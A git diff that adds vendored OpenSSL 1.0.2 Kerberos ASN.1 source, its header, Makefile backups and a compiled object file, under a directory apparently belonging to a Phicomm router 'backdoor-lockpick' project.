diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/Makefile.bak
new file mode 100644
index 0000000..1407739
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/Makefile.bak
@@ -0,0 +1,84 @@
+#
+# OpenSSL/krb5/Makefile
+#
+
+DIR=	krb5
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= krb5_asn.c
+
+LIBOBJ= krb5_asn.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= krb5_asn.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+krb5_asn.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+krb5_asn.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+krb5_asn.o: ../../include/openssl/e_os2.h ../../include/openssl/krb5_asn.h
+krb5_asn.o: ../../include/openssl/opensslconf.h
+krb5_asn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+krb5_asn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+krb5_asn.o: ../../include/openssl/symhacks.h krb5_asn.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/Makefile.save
new file mode 100644
index 0000000..1407739
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/Makefile.save
@@ -0,0 +1,84 @@
+#
+# OpenSSL/krb5/Makefile
+#
+
+DIR=	krb5
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= krb5_asn.c
+
+LIBOBJ= krb5_asn.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= krb5_asn.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+krb5_asn.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+krb5_asn.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+krb5_asn.o: ../../include/openssl/e_os2.h ../../include/openssl/krb5_asn.h
+krb5_asn.o: ../../include/openssl/opensslconf.h
+krb5_asn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+krb5_asn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+krb5_asn.o: ../../include/openssl/symhacks.h krb5_asn.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/krb5_asn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/krb5_asn.c
new file mode 100644
index 0000000..d9851e9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/krb5_asn.c
@@ -0,0 +1,162 @@
+/* krb5_asn.c */
+/*
+ * Written by Vern Staats <staatsvr@asc.hpc.mil> for the OpenSSL project, **
+ * using ocsp/{*.h,*asn*.c} as a starting point
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/krb5_asn.h>
+
+
+ASN1_SEQUENCE(KRB5_ENCDATA) = {
+        ASN1_EXP(KRB5_ENCDATA, etype,           ASN1_INTEGER,     0),
+        ASN1_EXP_OPT(KRB5_ENCDATA, kvno,        ASN1_INTEGER,     1),
+        ASN1_EXP(KRB5_ENCDATA, cipher,          ASN1_OCTET_STRING,2)
+} ASN1_SEQUENCE_END(KRB5_ENCDATA)
+
+IMPLEMENT_ASN1_FUNCTIONS(KRB5_ENCDATA)
+
+
+ASN1_SEQUENCE(KRB5_PRINCNAME) = {
+        ASN1_EXP(KRB5_PRINCNAME, nametype,      ASN1_INTEGER,     0),
+        ASN1_EXP_SEQUENCE_OF(KRB5_PRINCNAME, namestring, ASN1_GENERALSTRING, 1)
+} ASN1_SEQUENCE_END(KRB5_PRINCNAME)
+
+IMPLEMENT_ASN1_FUNCTIONS(KRB5_PRINCNAME)
+
+/* [APPLICATION 1] = 0x61 */
+ASN1_SEQUENCE(KRB5_TKTBODY) = {
+        ASN1_EXP(KRB5_TKTBODY, tktvno,          ASN1_INTEGER,     0),
+        ASN1_EXP(KRB5_TKTBODY, realm,           ASN1_GENERALSTRING, 1),
+        ASN1_EXP(KRB5_TKTBODY, sname,           KRB5_PRINCNAME,   2),
+        ASN1_EXP(KRB5_TKTBODY, encdata,         KRB5_ENCDATA,     3)
+} ASN1_SEQUENCE_END(KRB5_TKTBODY)
+
+IMPLEMENT_ASN1_FUNCTIONS(KRB5_TKTBODY)
+
+
+ASN1_ITEM_TEMPLATE(KRB5_TICKET) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_EXPTAG|ASN1_TFLG_APPLICATION, 1,
+                        KRB5_TICKET, KRB5_TKTBODY)
+ASN1_ITEM_TEMPLATE_END(KRB5_TICKET)
+
+IMPLEMENT_ASN1_FUNCTIONS(KRB5_TICKET)
+
+/* [APPLICATION 14] = 0x6e */
+ASN1_SEQUENCE(KRB5_APREQBODY) = {
+        ASN1_EXP(KRB5_APREQBODY, pvno,          ASN1_INTEGER,     0),
+        ASN1_EXP(KRB5_APREQBODY, msgtype,       ASN1_INTEGER,     1),
+        ASN1_EXP(KRB5_APREQBODY, apoptions,     ASN1_BIT_STRING,  2),
+        ASN1_EXP(KRB5_APREQBODY, ticket,        KRB5_TICKET,      3),
+        ASN1_EXP(KRB5_APREQBODY, authenticator, KRB5_ENCDATA,     4),
+} ASN1_SEQUENCE_END(KRB5_APREQBODY)
+
+IMPLEMENT_ASN1_FUNCTIONS(KRB5_APREQBODY)
+
+ASN1_ITEM_TEMPLATE(KRB5_APREQ) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_EXPTAG|ASN1_TFLG_APPLICATION, 14,
+                        KRB5_APREQ, KRB5_APREQBODY)
+ASN1_ITEM_TEMPLATE_END(KRB5_APREQ)
+
+IMPLEMENT_ASN1_FUNCTIONS(KRB5_APREQ)
+
+/*  Authenticator stuff         */
+
+ASN1_SEQUENCE(KRB5_CHECKSUM) = {
+        ASN1_EXP(KRB5_CHECKSUM, ctype,          ASN1_INTEGER,     0),
+        ASN1_EXP(KRB5_CHECKSUM, checksum,       ASN1_OCTET_STRING,1)
+} ASN1_SEQUENCE_END(KRB5_CHECKSUM)
+
+IMPLEMENT_ASN1_FUNCTIONS(KRB5_CHECKSUM)
+
+
+ASN1_SEQUENCE(KRB5_ENCKEY) = {
+        ASN1_EXP(KRB5_ENCKEY,   ktype,          ASN1_INTEGER,     0),
+        ASN1_EXP(KRB5_ENCKEY,   keyvalue,       ASN1_OCTET_STRING,1)
+} ASN1_SEQUENCE_END(KRB5_ENCKEY)
+
+IMPLEMENT_ASN1_FUNCTIONS(KRB5_ENCKEY)
+
+/* SEQ OF SEQ; see ASN1_EXP_SEQUENCE_OF_OPT() below */
+ASN1_SEQUENCE(KRB5_AUTHDATA) = {
+        ASN1_EXP(KRB5_AUTHDATA, adtype,         ASN1_INTEGER,     0),
+        ASN1_EXP(KRB5_AUTHDATA, addata,         ASN1_OCTET_STRING,1)
+} ASN1_SEQUENCE_END(KRB5_AUTHDATA)
+
+IMPLEMENT_ASN1_FUNCTIONS(KRB5_AUTHDATA)
+
+/* [APPLICATION 2] = 0x62 */
+ASN1_SEQUENCE(KRB5_AUTHENTBODY) = {
+        ASN1_EXP(KRB5_AUTHENTBODY,      avno,   ASN1_INTEGER,     0),
+        ASN1_EXP(KRB5_AUTHENTBODY,      crealm, ASN1_GENERALSTRING, 1),
+        ASN1_EXP(KRB5_AUTHENTBODY,      cname,  KRB5_PRINCNAME,   2),
+        ASN1_EXP_OPT(KRB5_AUTHENTBODY,  cksum,  KRB5_CHECKSUM,    3),
+        ASN1_EXP(KRB5_AUTHENTBODY,      cusec,  ASN1_INTEGER,     4),
+        ASN1_EXP(KRB5_AUTHENTBODY,      ctime,  ASN1_GENERALIZEDTIME, 5),
+        ASN1_EXP_OPT(KRB5_AUTHENTBODY,  subkey, KRB5_ENCKEY,      6),
+        ASN1_EXP_OPT(KRB5_AUTHENTBODY,  seqnum, ASN1_INTEGER,     7),
+        ASN1_EXP_SEQUENCE_OF_OPT
+                    (KRB5_AUTHENTBODY,  authorization,  KRB5_AUTHDATA, 8),
+} ASN1_SEQUENCE_END(KRB5_AUTHENTBODY)
+
+IMPLEMENT_ASN1_FUNCTIONS(KRB5_AUTHENTBODY)
+
+ASN1_ITEM_TEMPLATE(KRB5_AUTHENT) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_EXPTAG|ASN1_TFLG_APPLICATION, 2,
+                        KRB5_AUTHENT, KRB5_AUTHENTBODY)
+ASN1_ITEM_TEMPLATE_END(KRB5_AUTHENT)
+
+IMPLEMENT_ASN1_FUNCTIONS(KRB5_AUTHENT)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/krb5_asn.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/krb5_asn.h
new file mode 100644
index 0000000..9cf5a26
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/krb5_asn.h
@@ -0,0 +1,240 @@
+/* krb5_asn.h */
+/*
+ * Written by Vern Staats <staatsvr@asc.hpc.mil> for the OpenSSL project, **
+ * using ocsp/{*.h,*asn*.c} as a starting point
+ */
+
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_KRB5_ASN_H
+# define HEADER_KRB5_ASN_H
+
+/*
+ * #include <krb5.h>
+ */
+# include <openssl/safestack.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/*
+ * ASN.1 from Kerberos RFC 1510
+ */
+
+/*-     EncryptedData ::=   SEQUENCE {
+ *              etype[0]                      INTEGER, -- EncryptionType
+ *              kvno[1]                       INTEGER OPTIONAL,
+ *              cipher[2]                     OCTET STRING -- ciphertext
+ *      }
+ */
+typedef struct krb5_encdata_st {
+    ASN1_INTEGER *etype;
+    ASN1_INTEGER *kvno;
+    ASN1_OCTET_STRING *cipher;
+} KRB5_ENCDATA;
+
+DECLARE_STACK_OF(KRB5_ENCDATA)
+
+/*-     PrincipalName ::=   SEQUENCE {
+ *              name-type[0]                  INTEGER,
+ *              name-string[1]                SEQUENCE OF GeneralString
+ *      }
+ */
+typedef struct krb5_princname_st {
+    ASN1_INTEGER *nametype;
+    STACK_OF(ASN1_GENERALSTRING) *namestring;
+} KRB5_PRINCNAME;
+
+DECLARE_STACK_OF(KRB5_PRINCNAME)
+
+/*-     Ticket ::=      [APPLICATION 1] SEQUENCE {
+ *              tkt-vno[0]                    INTEGER,
+ *              realm[1]                      Realm,
+ *              sname[2]                      PrincipalName,
+ *              enc-part[3]                   EncryptedData
+ *      }
+ */
+typedef struct krb5_tktbody_st {
+    ASN1_INTEGER *tktvno;
+    ASN1_GENERALSTRING *realm;
+    KRB5_PRINCNAME *sname;
+    KRB5_ENCDATA *encdata;
+} KRB5_TKTBODY;
+
+typedef STACK_OF(KRB5_TKTBODY) KRB5_TICKET;
+DECLARE_STACK_OF(KRB5_TKTBODY)
+
+/*-     AP-REQ ::=      [APPLICATION 14] SEQUENCE {
+ *              pvno[0]                       INTEGER,
+ *              msg-type[1]                   INTEGER,
+ *              ap-options[2]                 APOptions,
+ *              ticket[3]                     Ticket,
+ *              authenticator[4]              EncryptedData
+ *      }
+ *
+ *      APOptions ::=   BIT STRING {
+ *              reserved(0), use-session-key(1), mutual-required(2) }
+ */
+typedef struct krb5_ap_req_st {
+    ASN1_INTEGER *pvno;
+    ASN1_INTEGER *msgtype;
+    ASN1_BIT_STRING *apoptions;
+    KRB5_TICKET *ticket;
+    KRB5_ENCDATA *authenticator;
+} KRB5_APREQBODY;
+
+typedef STACK_OF(KRB5_APREQBODY) KRB5_APREQ;
+DECLARE_STACK_OF(KRB5_APREQBODY)
+
+/*      Authenticator Stuff     */
+
+/*-     Checksum ::=   SEQUENCE {
+ *              cksumtype[0]                  INTEGER,
+ *              checksum[1]                   OCTET STRING
+ *      }
+ */
+typedef struct krb5_checksum_st {
+    ASN1_INTEGER *ctype;
+    ASN1_OCTET_STRING *checksum;
+} KRB5_CHECKSUM;
+
+DECLARE_STACK_OF(KRB5_CHECKSUM)
+
+/*-     EncryptionKey ::=   SEQUENCE {
+ *              keytype[0]                    INTEGER,
+ *              keyvalue[1]                   OCTET STRING
+ *      }
+ */
+typedef struct krb5_encryptionkey_st {
+    ASN1_INTEGER *ktype;
+    ASN1_OCTET_STRING *keyvalue;
+} KRB5_ENCKEY;
+
+DECLARE_STACK_OF(KRB5_ENCKEY)
+
+/*-     AuthorizationData ::=   SEQUENCE OF SEQUENCE {
+ *              ad-type[0]                    INTEGER,
+ *              ad-data[1]                    OCTET STRING
+ *      }
+ */
+typedef struct krb5_authorization_st {
+    ASN1_INTEGER *adtype;
+    ASN1_OCTET_STRING *addata;
+} KRB5_AUTHDATA;
+
+DECLARE_STACK_OF(KRB5_AUTHDATA)
+
+/*-     -- Unencrypted authenticator
+ *      Authenticator ::=    [APPLICATION 2] SEQUENCE    {
+ *              authenticator-vno[0]          INTEGER,
+ *              crealm[1]                     Realm,
+ *              cname[2]                      PrincipalName,
+ *              cksum[3]                      Checksum OPTIONAL,
+ *              cusec[4]                      INTEGER,
+ *              ctime[5]                      KerberosTime,
+ *              subkey[6]                     EncryptionKey OPTIONAL,
+ *              seq-number[7]                 INTEGER OPTIONAL,
+ *              authorization-data[8]         AuthorizationData OPTIONAL
+ *      }
+ */
+typedef struct krb5_authenticator_st {
+    ASN1_INTEGER *avno;
+    ASN1_GENERALSTRING *crealm;
+    KRB5_PRINCNAME *cname;
+    KRB5_CHECKSUM *cksum;
+    ASN1_INTEGER *cusec;
+    ASN1_GENERALIZEDTIME *ctime;
+    KRB5_ENCKEY *subkey;
+    ASN1_INTEGER *seqnum;
+    KRB5_AUTHDATA *authorization;
+} KRB5_AUTHENTBODY;
+
+typedef STACK_OF(KRB5_AUTHENTBODY) KRB5_AUTHENT;
+DECLARE_STACK_OF(KRB5_AUTHENTBODY)
+
+/*-  DECLARE_ASN1_FUNCTIONS(type) = DECLARE_ASN1_FUNCTIONS_name(type, type) =
+ *      type *name##_new(void);
+ *      void name##_free(type *a);
+ *      DECLARE_ASN1_ENCODE_FUNCTIONS(type, name, name) =
+ *       DECLARE_ASN1_ENCODE_FUNCTIONS(type, itname, name) =
+ *        type *d2i_##name(type **a, const unsigned char **in, long len);
+ *        int i2d_##name(type *a, unsigned char **out);
+ *        DECLARE_ASN1_ITEM(itname) = OPENSSL_EXTERN const ASN1_ITEM itname##_it
+ */
+
+DECLARE_ASN1_FUNCTIONS(KRB5_ENCDATA)
+DECLARE_ASN1_FUNCTIONS(KRB5_PRINCNAME)
+DECLARE_ASN1_FUNCTIONS(KRB5_TKTBODY)
+DECLARE_ASN1_FUNCTIONS(KRB5_APREQBODY)
+DECLARE_ASN1_FUNCTIONS(KRB5_TICKET)
+DECLARE_ASN1_FUNCTIONS(KRB5_APREQ)
+
+DECLARE_ASN1_FUNCTIONS(KRB5_CHECKSUM)
+DECLARE_ASN1_FUNCTIONS(KRB5_ENCKEY)
+DECLARE_ASN1_FUNCTIONS(KRB5_AUTHDATA)
+DECLARE_ASN1_FUNCTIONS(KRB5_AUTHENTBODY)
+DECLARE_ASN1_FUNCTIONS(KRB5_AUTHENT)
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/krb5_asn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/krb5_asn.o
new file mode 100644
index 0000000000000000000000000000000000000000..bff6735bf4e16e7cd16bb83cc167105f832ecc37
GIT binary patch
literal 14360
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
